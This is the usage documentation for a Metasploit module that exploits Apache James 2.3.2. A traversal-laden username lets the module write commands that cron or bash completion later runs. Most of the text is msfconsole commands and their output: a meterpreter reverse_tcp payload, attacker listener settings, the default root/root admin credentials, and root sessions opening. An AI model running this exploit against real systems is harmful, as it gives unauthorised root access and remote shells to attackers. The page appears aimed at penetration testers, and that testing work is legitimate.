## Vulnerable Application This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here: https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf ## Verification Steps __1.__ Start msfconsole __2.__ DO: Load module exploit/linux/smtp/apache_james_exec __3.__ DO: Set the remote and local options: rhosts, lhosts, lport __4.__ DO: Set the preferred payload __5.__ DO: Run the check method to determine vulnerability __6.__ DO: Run the exploit __7.__ The payload will connect to the listener if the exploit is successful ## Options ### USERNAME: The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'. ### PASSWORD: The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'. ### ADMINPORT: The port for Apache James 2.3.2 remote administration tool. By default this is '4555'. ### RHOSTS: The IP address of the vulnerable server. ### RPORT: The port number of the SMTP service. ### POP3PORT The port for the POP3 Apache James Service. By default this '110'. ## Scenarios **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the mail objects. __1.__ Load the module: ``` msf > use exploit/linux/smtp/apache_james_exec ``` __2.__ Set remote and local options: ``` msf exploit(linux/smtp/apache_james_exec) > set target 1 target => 1 msf exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.169 rhosts => 192.168.224.169 msf exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 lhost => 192.168.224.167 msf exploit(linux/smtp/apache_james_exec) > set lport 4444 lport => 4444 ``` __3.__ Set payload: ``` msf exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp ``` __4.__ Check version and run exploit: ``` msf exploit(linux/smtp/apache_james_exec) > check [*] 192.168.224.164:25 - The target appears to be vulnerable. msf exploit(linux/smtp/apache_james_exec) > exploit [*] Started reverse TCP handler on 192.168.224.167:4444 [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload [*] Sending stage (3021284 bytes) to 192.168.224.169 [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800 [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes) meterpreter > ``` --------------------------------------------------------------------------------------------- **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account. __1.__ Load the module: ``` msf > use exploit/linux/smtp/apache_james_exec ``` __2.__ Set remote and local options: ``` msf exploit(linux/smtp/apache_james_exec) > set target 0 target => 0 msf exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164 rhosts => 192.168.224.164 msf exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 lhost => 192.168.224.167 msf exploit(linux/smtp/apache_james_exec) > set lport 4444 lport => 4444 ``` __3.__ Set payload: ``` msf exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp ``` __4.__ Check version and run exploit: ``` msf exploit(linux/smtp/apache_james_exec) > check [*] 192.168.224.164:25 - The target appears to be vulnerable. msf exploit(linux/smtp/apache_james_exec) > exploit [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes) ``` __5.__ Set up and run listener (Can be done before running exploit): ``` msf exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf exploit(multi/handler) > set lport 4444 lport => 4444 msf exploit(multi/handler) > set lhost 192.168.224.167 lhost => 192.168.224.167 msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.224.167:4444 [*] Sending stage (3021284 bytes) to 192.168.224.164 [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800 meterpreter > ``` ## Targets ``` Id Name -- ---- 0 Bash Completion 1 Cron ``` ## References 1. 2.